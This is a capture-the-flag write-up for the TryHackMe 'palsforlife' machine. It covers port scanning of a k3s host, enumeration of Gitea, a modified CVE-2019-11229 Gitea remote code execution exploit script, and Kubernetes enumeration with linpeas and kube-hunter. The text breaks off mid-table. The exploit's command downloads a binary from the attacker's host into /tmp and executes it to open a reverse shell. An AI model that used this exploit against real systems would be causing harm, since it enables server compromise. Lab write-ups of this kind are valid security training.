machine writeups for https://tryhackme.com/room/palsforlife

pre-pentesting (general information gathering)

port & serivce

Beacuse of the network and machine deployment, command like nmap or rustscan need to retry several times times to get the correct information.

command : rustscan <target ip> -- -A

PORT      STATE SERVICE           REASON         VERSION

22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c9:f7:dd:3d:79:bb:f8:44:0f:bd:87:bd:8b:af:e1:5a (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDHvPJdllGsYwbwbvXMP0T/d6NcClFy34rSyAVlCPB5jeR0/7DffGcCbj/+kwkTKw82Eb6HtTLKvQwFQduzGqba74IUgxJ3NmQ4IrnbwYg0Mqf1z0ZWeD3rMQKOJeDKcApnW24P2zjBjZ8iNf449DzQLQoQyhti0MQavrLYMwcELCd3u+83FD0pZZN4q5d5yor9EV++lZ5fpU0+seEWoXY9c0LfA9CX+6jwv2cQFTwqC8R78kkTimczT8tVVds/z0KUwpL7t2lsVMxIJ1SKi7XiroU0zJ+YkttZoio7++1vGtW+27Kv/PGQPI7v+953TPZ06BPC3/nxU7CD9Gtpig/h
| 256 4c:48:9d:c6:b4:e2:17:99:76:48:20:fe:96:d2:c8:eb (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBKRe1KeqoY2DzrMJa+jbQPKLy+IMjqWDOtBQy+Oohg2R+bm1H1VcJWSTE2HhxW7GsbzBEAtqW+290KhTOOmiSQ=
| 256 d8:e2:f7:ac:4d:cd:68:66:d7:a9:64:1c:42:4a:8e:30 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKiIJ3rd6/JIuiXUx0sJhq8nY1ZypBueO4uckLvIzpur

6443/tcp open ssl/sun-sr-https? syn-ack ttl 63
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 401 Unauthorized
| Cache-Control: no-cache, private
| Content-Type: application/json
| Date: Sat, 25 Sep 2021 01:26:28 GMT
| Content-Length: 129
| {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"Unauthorized","reason":"Unauthorized","code":401}
| GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 401 Unauthorized
| Cache-Control: no-cache, private
| Content-Type: application/json
| Date: Sat, 25 Sep 2021 01:25:52 GMT
| Content-Length: 129
| {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"Unauthorized","reason":"Unauthorized","code":401}
| HTTPOptions:
| HTTP/1.0 401 Unauthorized
| Cache-Control: no-cache, private
| Content-Type: application/json
| Date: Sat, 25 Sep 2021 01:25:53 GMT
| Content-Length: 129
|_ {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"Unauthorized","reason":"Unauthorized","code":401}
| ssl-cert: Subject: commonName=k3s/organizationName=k3s
| Subject Alternative Name: DNS:kubernetes, DNS:kubernetes.default, DNS:kubernetes.default.svc.cluster.local, DNS:localhost, IP Address:10.10.53.211, IP Address:10.43.0.1, IP Address:127.0.0.1, IP Address:172.30.18.136, IP Address:192.168.1.244
| Issuer: commonName=k3s-server-[email protected]1622498168
| Public Key type: ec
| Public Key bits: 256
| Signature Algorithm: ecdsa-with-SHA256
| Not valid before: 2021-05-31T21:56:08
| Not valid after: 2022-09-25T01:23:17
| MD5: 89c4 db42 e7d3 765a 081b 97fe bfaa b6cf
| SHA-1: 668a 6282 5cc2 6e3c c3bf 7da1 14cf 8801 e4bc 9e96
| -----BEGIN CERTIFICATE-----
| MIIB+jCCAZ+gAwIBAgIIMnJT9t9Cx68wCgYIKoZIzj0EAwIwIzEhMB8GA1UEAwwY
| azNzLXNlcnZlci1jYUAxNjIyNDk4MTY4MB4XDTIxMDUzMTIxNTYwOFoXDTIyMDky
| NTAxMjMxN1owHDEMMAoGA1UEChMDazNzMQwwCgYDVQQDEwNrM3MwWTATBgcqhkjO
| PQIBBggqhkjOPQMBBwNCAAQBAUGk5Ox0oLT3rZzPJUCVmQiwoHcg1zdU61yDtWZh
| 3Xv9/5BRkm/Hub4A1/z45qmNzYAdjAqi11p6s6lZhzfmo4HDMIHAMA4GA1UdDwEB
| /wQEAwIFoDATBgNVHSUEDDAKBggrBgEFBQcDATAfBgNVHSMEGDAWgBTmY3iEZ5WD
| XNcMriUDriCamzSP1zB4BgNVHREEcTBvggprdWJlcm5ldGVzghJrdWJlcm5ldGVz
| LmRlZmF1bHSCJGt1YmVybmV0ZXMuZGVmYXVsdC5zdmMuY2x1c3Rlci5sb2NhbIIJ
| bG9jYWxob3N0hwQKCjXThwQKKwABhwR/AAABhwSsHhKIhwTAqAH0MAoGCCqGSM49
| BAMCA0kAMEYCIQCTBtM0bMaYyNXrhpQezb+G0EVvM5LyZKj0bhX5eRb9SAIhAJPH
| qkCr6HzVM2W4xPIEii7AuxAFSYUfihG508IXJL3v
|_-----END CERTIFICATE-----

10250/tcp open ssl/http syn-ack ttl 63 Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
| ssl-cert: Subject: commonName=palsforlife
| Subject Alternative Name: DNS:palsforlife, DNS:localhost, IP Address:127.0.0.1, IP Address:10.10.53.211
| Issuer: commonName=k3s-server-[email protected]1622498168
| Public Key type: ec
| Public Key bits: 256
| Signature Algorithm: ecdsa-with-SHA256
| Not valid before: 2021-05-31T21:56:08
| Not valid after: 2022-09-25T01:22:28
| MD5: dd8f 3e00 984a aae5 b092 cf90 5a65 7b58
| SHA-1: 92ea 9137 6e13 4d03 6317 4561 b064 bbbe 3d06 f7be
| -----BEGIN CERTIFICATE-----
| MIIBpzCCAUygAwIBAgIIQjzEiOpggAwwCgYIKoZIzj0EAwIwIzEhMB8GA1UEAwwY
| azNzLXNlcnZlci1jYUAxNjIyNDk4MTY4MB4XDTIxMDUzMTIxNTYwOFoXDTIyMDky
| NTAxMjIyOFowFjEUMBIGA1UEAxMLcGFsc2ZvcmxpZmUwWTATBgcqhkjOPQIBBggq
| hkjOPQMBBwNCAAQ3WT5sy0DB2LeKatk1dcRAuf7KwhCTIxwWTR5YwpyK+1oUEe4L
| 0hKr17Tzp30JWGZ48Xm/UUQdNfdt3iX+mzd1o3cwdTAOBgNVHQ8BAf8EBAMCBaAw
| EwYDVR0lBAwwCgYIKwYBBQUHAwEwHwYDVR0jBBgwFoAU5mN4hGeVg1zXDK4lA64g
| mps0j9cwLQYDVR0RBCYwJIILcGFsc2ZvcmxpZmWCCWxvY2FsaG9zdIcEfwAAAYcE
| Cgo10zAKBggqhkjOPQQDAgNJADBGAiEAzI+QitsVbL9J3cIQuEarpuONH0MC9/Bc
| pjFDsBTW1tICIQC2TySKCJDaXR0eRyYQtPsjyVlI50mUuII1DsT3aN236w==
|_-----END CERTIFICATE-----

30180/tcp open http syn-ack ttl 62 nginx 1.21.0
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.21.0
|_http-title: 403 Forbidden

31111/tcp open unknown syn-ack ttl 62
| fingerprint-strings:
| GenericLines:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
| Set-Cookie: i_like_gitea=9a7a433126963280; Path=/; HttpOnly
| Set-Cookie: _csrf=M3bNOq17RI26F_1JdUfUXASpTfA6MTYzMjUzMzE0NTE2Njk0MzY5OQ%3D%3D; Path=/; Expires=Sun, 26 Sep 2021 01:25:45 GMT; HttpOnly
| X-Frame-Options: SAMEORIGIN
| Date: Sat, 25 Sep 2021 01:25:45 GMT
| <!DOCTYPE html>
| <html>
| <head data-suburl="">
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>Gitea: Git with a cup of tea</title>
| <meta name="theme-color" content="#6cc644">
| <meta name="author" content="Gitea - Git with a cup of tea" />
| <meta name="description" content="Gitea (Git with a cup of tea) is a painless self-hosted Git service written in Go" />
| <meta name="keywords" content="go,git,self-hosted,gitea
| HTTPOptions:
| HTTP/1.0 404 Not Found
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
| Set-Cookie: i_like_gitea=850e8dbfd631d68e; Path=/; HttpOnly
| Set-Cookie: _csrf=PhEztTb31LOiE2Ielp2pGvVKRL06MTYzMjUzMzE0NTg1ODk3MzA3NA%3D%3D; Path=/; Expires=Sun, 26 Sep 2021 01:25:45 GMT; HttpOnly
| X-Frame-Options: SAMEORIGIN
| Date: Sat, 25 Sep 2021 01:25:45 GMT
| <!DOCTYPE html>
| <html>
| <head data-suburl="">
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>Page Not Found - Gitea: Git with a cup of tea</title>
| <meta name="theme-color" content="#6cc644">
| <meta name="author" content="Gitea - Git with a cup of tea" />
| <meta name="description" content="Gitea (Git with a cup of tea) is a painless self-hosted Git service written in Go" />
|_ <meta name="keywords" content="

31112/tcp open ssh syn-ack ttl 62 OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey:
| 2048 2b:c6:63:84:93:b8:04:ce:1c:f5:ce:c7:0e:ca:eb:28 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDL89blW/fideD2Xo7UKOytdLmzkVLToqJFWPKHQ4UP9ZNXTr7GAqeXvRRB9wmdsv4CpNRnQh3KtHuB7QgfZA//6aHtf5ss8zQydhZW5HS6a3Y2DhRnmOLtDQK5XHA1icP2EMYKIH0rfgPFFm1SRUieqbn62Zu//Cd8TdTfax7u1X3raA1nA7WEa+bnH1U4zO7sC6pZVSh7OoDRR/uD8r1xy2IxwcEIHyLVYdJdjxNhy8ryzkU1fwwLbzhSOsA+9bN/V4pq5/tLvipsX5FpIeF7CwHd+3EWlHl64zTWuCnvr5u/MBN3Q/bM2UGbwxj8Jq8tFRbQXoSfXpTrodKmLBSB
| 256 93:6b:41:5f:89:14:97:0c:6b:53:ab:ba:af:71:f1:40 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKWQuDYkhFhWAillXUpZDXIg86x6wt2RLODmfT6jSjAW8VQO+B6efJrMV5Z5YkJ57WmqTF2rPDxEBIegPiMHddU=
| 256 e8:c4:94:7b:72:d7:4c:1c:bd:51:4a:84:81:4b:68:c9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILJgWYJQirOpfa5TYPCcHU+p2NbHFMTjHFyTyGU9KVng
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port6443-TCP:V=7.91%T=SSL%I=7%D=9/25%Time=614E7A9F%P=x86_64-pc-linux-gn
SF:u%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type
SF::\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x2
SF:0Bad\x20Request")%r(GetRequest,11A,"HTTP/1\.0\x20401\x20Unauthorized\r\
SF:nCache-Control:\x20no-cache,\x20private\r\nContent-Type:\x20application
SF:/json\r\nDate:\x20Sat,\x2025\x20Sep\x202021\x2001:25:52\x20GMT\r\nConte
SF:nt-Length:\x20129\r\n\r\n{\"kind\":\"Status\",\"apiVersion\":\"v1\",\"m
SF:etadata\":{},\"status\":\"Failure\",\"message\":\"Unauthorized\",\"reas
SF:on\":\"Unauthorized\",\"code\":401}\n")%r(HTTPOptions,11A,"HTTP/1\.0\x2
SF:0401\x20Unauthorized\r\nCache-Control:\x20no-cache,\x20private\r\nConte
SF:nt-Type:\x20application/json\r\nDate:\x20Sat,\x2025\x20Sep\x202021\x200
SF:1:25:53\x20GMT\r\nContent-Length:\x20129\r\n\r\n{\"kind\":\"Status\",\"
SF:apiVersion\":\"v1\",\"metadata\":{},\"status\":\"Failure\",\"message\":
SF:\"Unauthorized\",\"reason\":\"Unauthorized\",\"code\":401}\n")%r(RTSPRe
SF:quest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/p
SF:lain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Req
SF:uest")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x
SF:20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Ba
SF:d\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r
SF:\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close
SF:\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1\.1\x2
SF:0400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8
SF:\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TLSSessionReq
SF:,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;
SF:\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request"
SF:)%r(Kerberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x2
SF:0text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad
SF:\x20Request")%r(FourOhFourRequest,11A,"HTTP/1\.0\x20401\x20Unauthorized
SF:\r\nCache-Control:\x20no-cache,\x20private\r\nContent-Type:\x20applicat
SF:ion/json\r\nDate:\x20Sat,\x2025\x20Sep\x202021\x2001:26:28\x20GMT\r\nCo
SF:ntent-Length:\x20129\r\n\r\n{\"kind\":\"Status\",\"apiVersion\":\"v1\",
SF:\"metadata\":{},\"status\":\"Failure\",\"message\":\"Unauthorized\",\"r
SF:eason\":\"Unauthorized\",\"code\":401}\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port31111-TCP:V=7.91%I=7%D=9/25%Time=614E7A98%P=x86_64-pc-linux-gnu%r(G
SF:enericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20
SF:text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\
SF:x20Request")%r(GetRequest,2699,"HTTP/1\.0\x20200\x20OK\r\nContent-Type:
SF:\x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en-US;\x20Path=/
SF:;\x20Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gitea=9a7a433126963280
SF:;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=M3bNOq17RI26F_1JdUfUXA
SF:SpTfA6MTYzMjUzMzE0NTE2Njk0MzY5OQ%3D%3D;\x20Path=/;\x20Expires=Sun,\x202
SF:6\x20Sep\x202021\x2001:25:45\x20GMT;\x20HttpOnly\r\nX-Frame-Options:\x2
SF:0SAMEORIGIN\r\nDate:\x20Sat,\x2025\x20Sep\x202021\x2001:25:45\x20GMT\r\
SF:n\r\n<!DOCTYPE\x20html>\n<html>\n<head\x20data-suburl=\"\">\n\t<meta\x2
SF:0charset=\"utf-8\">\n\t<meta\x20name=\"viewport\"\x20content=\"width=de
SF:vice-width,\x20initial-scale=1\">\n\t<meta\x20http-equiv=\"x-ua-compati
SF:ble\"\x20content=\"ie=edge\">\n\t<title>Gitea:\x20Git\x20with\x20a\x20c
SF:up\x20of\x20tea</title>\n\t<meta\x20name=\"theme-color\"\x20content=\"#
SF:6cc644\">\n\t<meta\x20name=\"author\"\x20content=\"Gitea\x20-\x20Git\x2
SF:0with\x20a\x20cup\x20of\x20tea\"\x20/>\n\t<meta\x20name=\"description\"
SF:\x20content=\"Gitea\x20\(Git\x20with\x20a\x20cup\x20of\x20tea\)\x20is\x
SF:20a\x20painless\x20self-hosted\x20Git\x20service\x20written\x20in\x20Go
SF:\"\x20/>\n\t<meta\x20name=\"keywords\"\x20content=\"go,git,self-hosted,
SF:gitea")%r(HTTPOptions,1E87,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent
SF:-Type:\x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en-US;\x20
SF:Path=/;\x20Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gitea=850e8dbfd6
SF:31d68e;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=PhEztTb31LOiE2Ie
SF:lp2pGvVKRL06MTYzMjUzMzE0NTg1ODk3MzA3NA%3D%3D;\x20Path=/;\x20Expires=Sun
SF:,\x2026\x20Sep\x202021\x2001:25:45\x20GMT;\x20HttpOnly\r\nX-Frame-Optio
SF:ns:\x20SAMEORIGIN\r\nDate:\x20Sat,\x2025\x20Sep\x202021\x2001:25:45\x20
SF:GMT\r\n\r\n<!DOCTYPE\x20html>\n<html>\n<head\x20data-suburl=\"\">\n\t<m
SF:eta\x20charset=\"utf-8\">\n\t<meta\x20name=\"viewport\"\x20content=\"wi
SF:dth=device-width,\x20initial-scale=1\">\n\t<meta\x20http-equiv=\"x-ua-c
SF:ompatible\"\x20content=\"ie=edge\">\n\t<title>Page\x20Not\x20Found\x20-
SF:\x20Gitea:\x20Git\x20with\x20a\x20cup\x20of\x20tea</title>\n\t<meta\x20
SF:name=\"theme-color\"\x20content=\"#6cc644\">\n\t<meta\x20name=\"author\
SF:"\x20content=\"Gitea\x20-\x20Git\x20with\x20a\x20cup\x20of\x20tea\"\x20
SF:/>\n\t<meta\x20name=\"description\"\x20content=\"Gitea\x20\(Git\x20with
SF:\x20a\x20cup\x20of\x20tea\)\x20is\x20a\x20painless\x20self-hosted\x20Gi
SF:t\x20service\x20written\x20in\x20Go\"\x20/>\n\t<meta\x20name=\"keywords
SF:\"\x20content=\"");

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%), Linux 3.7 - 3.10 (92%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.91%E=4%D=9/25%OT=22%CT=%CU=40767%PV=Y%DS=2%DC=T%G=N%TM=614E7B14%P=x86_64-pc-linux-gnu)
SEQ(SP=106%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)
OPS(O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST11NW7%O6=M505ST11)
WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)
ECN(R=Y%DF=Y%T=40%W=F507%O=M505NNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=40%CD=S)

wrap up

Ok. The keywords like [k3s, kubernetes ] is very obviously indicted to how server works.

We can have a guess that the gitea and nginx server at 31111/311112 port is one of the POD in the kubernetes. (very very possible and but some people not do like this )

This is the little knowledge about k8s

And also it has different domain name called palsforlife. So add it into our /etc/hosts file.

Hacking

Hacking entrypoint : Gitea

All access attemps of other services but gitea like ssh and nginx are permission denial. It exposes the register interface.

attemps

So, trun on our dir scanner and go to reg an account.

My account like that

{
"user": "root",
"pass": "esonhugh"
}

And it will be used later.

Gobuster finished like that.

$ gobuster -u http://<target-ip>/ --wordlist=/usr/share/wordlists/dirb/big.txt -t 30 # the wordlist is in my kali
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.53.211:31111/
[+] Method: GET
[+] Threads: 30
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/09/25 09:44:51 Starting gobuster in directory enumeration mode
===============================================================
/Root (Status: 200) [Size: 10271]
/admin (Status: 302) [Size: 34] [--> /user/login]
/avatars (Status: 302) [Size: 32] [--> /avatars/] r
/debug (Status: 200) [Size: 160]
/explore (Status: 302) [Size: 37] [--> /explore/repos]
/healthcheck (Status: 200) [Size: 26]
/issues (Status: 302) [Size: 34] [--> /user/login]
/notifications (Status: 302) [Size: 34] [--> /user/login]
/root (Status: 200) [Size: 10271]

===============================================================
2021/09/25 09:50:19 Finished
===============================================================

root is my account, we can ignore it.

What we need to see is /debug, /healthcheck.They contains information about memory / CPUs, expose the file location info and stack print.

Gitea has api as well.

gitea_api: 
apis help: http://palsforlife:31111/api/swagger
apis json: http://palsforlife:31111/swagger.v1.json

use like that:

$ curl -X GET "http://palsforlife:31111/api/v1/version" \
-H "accept: application/json" -v

{"version number": "38d8b8c"}

# if commit hash is 38d8b8c ,you can find the version in github repo gitea release. That is 1.5.1.search in google as gitea release and use the Ctrl-F in chrome to search strings "38d8b8c" will get this.

exploits

Let’s find some Exploits or vulns about it. Go https://exploit-db.com/

It will give you 3 exploits of gitea. Exploits for version 1.4 is too low and 1.12.5 is higher. Let we check the 1.7.

AHHHH. My Senior ‘s exploits. :-)

https://www.exploit-db.com/exploits/49383

But it has a little problems. We need change the variables.

# Exploit Title: Gitea 1.7.5 - Remote Code Execution
# Date: 2021-09-25
# Exploit Reproducer: Skyworship
# Exploit Author: 1F98D
# Original Author: LoRexxar
# Software Link: https://gitea.io/en-us/
# Version: Gitea before 1.7.6 and 1.8.x before 1.8-RC3
# CVE: CVE-2019-11229
# References:
# https://medium.com/@knownsec404team/analysis-of-cve-2019-11229-from-git-config-to-rce-32c217727baa
#
# Gitea before 1.7.6 and 1.8.x before 1.8-RC3 mishandles mirror repo URL settings,
# leading to authenticated remote code execution.
#
#!/usr/bin/python3

import re
import os
import sys
import random
import string
import requests
import tempfile
import threading
import http.server
import socketserver
import urllib.parse
from functools import partial

USERNAME = "root" # the username for gitea
PASSWORD = "esonhugh" # the password for username
HOST_ADDR = "10.10.10.10" # your machine ip in vpn
HOST_PORT = 31111 # your machine git server listen on
URL = 'http://10.10.109.75:31111' # target machine gitea http url
CMD = 'wget http://"+HOST_ADDR+":8000/elfhandler -O /tmp/shellxxx ; chmod 777 /tmp/shellxxx ; /tmp/shellxxx'
# send payload by start httpserver hosting files "elfhandler" < your reverse tcp handler binary (e.g meterpreter)

# Login
s = requests.Session()
print('Logging in')
body = {
'user_name': USERNAME,
'password': PASSWORD
}
r = s.post(URL + '/user/login',data=body)
if r.status_code != 200:
print('Login unsuccessful')

sys.exit(1)
print('Logged in successfully')

# Obtain user ID for future requests
print('Retrieving user ID')
r = s.get(URL + '/')
if r.status_code != 200:
print('Could not retrieve user ID')
sys.exit(1)

m = re.compile("<meta name=\"_uid\" content=\"(.+)\" />").search(r.text)
USER_ID = m.group(1)
print('Retrieved user ID: {}'.format(USER_ID))

# Hosting the repository to clone
gitTemp = tempfile.mkdtemp()
os.system('cd {} && git init'.format(gitTemp))
os.system('cd {} && git config user.email [email protected] && git config user.name x && touch x && git add x && git commit -m x'.format(gitTemp))
os.system('git clone --bare {} {}.git'.format(gitTemp, gitTemp))
os.system('cd {}.git && git update-server-info'.format(gitTemp))
handler = partial(http.server.SimpleHTTPRequestHandler,directory='/tmp')
socketserver.TCPServer.allow_reuse_address = True
httpd = socketserver.TCPServer(("", HOST_PORT), handler)
t = threading.Thread(target=httpd.serve_forever)
t.start()
print('Created temporary git server to host {}.git'.format(gitTemp))

# Create the repository
print('Creating repository')
REPO_NAME = ''.join(random.choice(string.ascii_lowercase) for i in range(8))
body = {
'_csrf': urllib.parse.unquote(s.cookies.get('_csrf')),
'uid': USER_ID,
'repo_name': REPO_NAME,
'clone_addr': 'http://{}:{}/{}.git'.format(HOST_ADDR, HOST_PORT, gitTemp[5:]),
'mirror': 'on'
}
r = s.post(URL + '/repo/migrate', data=body)
if r.status_code != 200:
print('Error creating repo')
httpd.shutdown()
t.join()
sys.exit(1)
print('Repo "{}" created'.format(REPO_NAME))

# Inject command into config file
print('Injecting command into repo')
body = {
'_csrf': urllib.parse.unquote(s.cookies.get('_csrf')),
'mirror_address': 'ssh://example.com/x/x"""\r\n[core]\r\nsshCommand="{}"\r\na="""'.format(CMD),
'action': 'mirror',
'enable_prune': 'on',
'interval': '8h0m0s'
}
r = s.post(URL + '/' + USERNAME + '/' + REPO_NAME + '/settings', data=body)
if r.status_code != 200:
print('Error injecting command')
httpd.shutdown()
t.join()
sys.exit(1)
print('Command injected')

# Trigger the command
print('Triggering command')
body = {
'_csrf': urllib.parse.unquote(s.cookies.get('_csrf')),
'action': 'mirror-sync'
}
r = s.post(URL + '/' + USERNAME + '/' + REPO_NAME + '/settings', data=body)
if r.status_code != 200:
print('Error triggering command')
httpd.shutdown()
t.join()
sys.exit(1)

print('Command triggered')

# Shutdown the git server
httpd.shutdown()

# you need clean the git file handly.

Yep! Shell pop

Easily upload the linux enum file like linpeas.sh to collect more infos (https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) (meterpreter just use command upload )

linpeas will show the exploit methods with Hacktricks

Very useful site for hacking.

And use command like

nohup sh linpeas.sh > enum & # set it to hup

and get back the enum file.

Some location need attentions.

...
╔══════════╣ Protections
═╣ AppArmor enabled? .............. AppArmor Not Found
═╣ grsecurity present? ............ grsecurity Not Found
═╣ PaX bins present? .............. PaX Not Found
═╣ Execshield enabled? ............ Execshield Not Found
═╣ SELinux enabled? ............... sestatus Not Found
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes

════════════════════════════════════╣ Containers ╠════════════════════════════════════
╔══════════╣ Container related tools present
╔══════════╣ Container details
═╣ Is this a container? ........... No
(kubernetes)═╣ Any running containers? ........ No

╔══════════╣ Container & breakout enumeration
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout
═╣ Container ID ...................
═╣ Kubernetes namespace ........... default
═╣ Kubernetes token ............... <The k3s TOKEN there>
═╣ Vulnerable to CVE-2019-5021 .. No
...
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d

═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. total 12
drwxrwxrwx 3 root root 4096 May 31 22:01 .
drwxr-xr-x 1 root root 4096 Sep 25 01:25 ..
drwxr-xr-x 2 root root 4096 May 31 22:01 ..2021_05_31_22_01_32.228018415
lrwxrwxrwx 1 root root 31 May 31 22:01 ..data -> ..2021_05_31_22_01_32.228018415
lrwxrwxrwx 1 root root 16 May 31 22:01 flag2.txt -> ..data/flag2.txt

╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/root/
/root/flag2.txt
/root/..data
/root/..2021_05_31_22_01_32.228018415
/root/..2021_05_31_22_01_32.228018415/flag2.txt
...

Hacking K3s Pods - Token mis-config

Attemps

But Acutually i am new to K8s framework.

https://book.hacktricks.xyz/pentesting/pentesting-kubernetes This docs helps me a lot.

Now we are in pod which servers gitlab. I use the vuln scanner Kube-Hunter

Install and provide the Token, server to scan automatically.

You will meet the cert problems add -k options for Tools (curl kubectl) to ignore this.

Nodes
+-------------+-------------+
| TYPE | LOCATION |
+-------------+-------------+
| Node/Master | palsforlife |
+-------------+-------------+

Detected Services
+-------------+-------------------+----------------------+
| SERVICE | LOCATION | DESCRIPTION |
+-------------+-------------------+----------------------+
| Kubelet API | palsforlife:10250 | The Kubelet is the |
| | | main component in |
| | | every Node, all pod |
| | | operations goes |
| | | through the kubelet |
+-------------+-------------------+----------------------+
| API Server | palsforlife:6443 | The API server is in |
| | | charge of all |
| | | operations on the |
| | | cluster. |
+-------------+-------------------+----------------------+

Vulnerabilities
For further information about a vulnerability, search its ID in:
https://avd.aquasec.com/
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| ID | LOCATION | CATEGORY | VULNERABILITY | DESCRIPTION | EVIDENCE |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| KHV040 | palsforlife:10250 | Remote Code | Exposed Run Inside | An attacker could | uname -a: Linux ngin |
| | | Execution | Container | run an arbitrary | x-7f459c6889-8slv2 |
